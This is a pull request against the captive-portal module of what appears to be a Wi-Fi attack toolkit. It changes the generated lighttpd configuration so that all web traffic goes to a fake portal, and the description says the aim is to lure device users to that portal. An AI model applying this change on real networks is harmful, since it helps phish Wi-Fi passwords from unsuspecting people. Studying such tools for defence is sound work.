### PR TITLE
Global Captive Redirection

### DIFF
--- a/attacks/Captive Portal/attack.sh
+++ b/attacks/Captive Portal/attack.sh
@@ -480,13 +480,6 @@ index-file.names = (
 	\"index.html\",
     \"index.php\"
 )
-
-# Redirect all traffic to the captive portal.
-\$HTTP[\"host\"] != \"captive.gateway.lan\" {
-	url.redirect  = (
-		\"^/(.*)\" => \"http://captive.gateway.lan/\",
-	)
-}
 " > "$FLUXIONWorkspacePath/lighttpd.conf"
 
 	# Configure lighttpd's SSL only if we've got a certificate and its key.
@@ -516,9 +509,8 @@ index-file.names = (
 " >> "$FLUXIONWorkspacePath/lighttpd.conf"
     else
 		echo "\
-# Android requires an explicit redirection code on certain domains.
-# Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com
-\$HTTP[\"host\"] =~ \"((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com\" {
+# Redirect all traffic to the captive portal when not emulating a connection.
+\$HTTP[\"host\"] != \"captive.gateway.lan\" {
 	url.redirect  = (
 		\"^/(.*)\" => \"http://captive.gateway.lan/\",
 	)

--- a/attacks/Captive Portal/attack.sh
+++ b/attacks/Captive Portal/attack.sh
@@ -481,10 +481,12 @@ index-file.names = (
     \"index.php\"
 )
 
-# Redirect www.domain.com to domain.com
-#\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
-#	url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
-#}
+# Redirect all traffic to the captive portal.
+\$HTTP[\"host\"] != \"captive.gateway.lan\" {
+	url.redirect  = (
+		\"^/(.*)\" => \"http://captive.gateway.lan/\",
+	)
+}
 " > "$FLUXIONWorkspacePath/lighttpd.conf"
 
 	# Configure lighttpd's SSL only if we've got a certificate and its key.


### PR DESCRIPTION
<!-- Thanks for submitting a pull request! Please provide enough information so that others can review your pull request. -->

**What kind of change does this PR introduce?**
<!-- E.g. a bugfix, feature, refactoring, build related change, etc… -->
Potential bug fix for captive portal detection on some devices.

**Summary**
<!-- Explain the **motivation** for making this change. What existing problem does the pull request solve? -->
<!-- Try to link to an open issue for more information. -->
When the users choose to not emulate a connectivity on Android and iOS, all requests will be redirected to `captive.gateway.lan`. This should help some devices detect they're behind a captive portal, luring the user to the captive portal.

**Does this PR introduce a breaking change?**
<!-- If this PR introduces a breaking change, please describe the impact and a migration path for existing applications. -->
I don't think so.

**Other information**
Before, only certain Android domains were being explicitly redirected to the captive portal. This assures all domains will be redirected.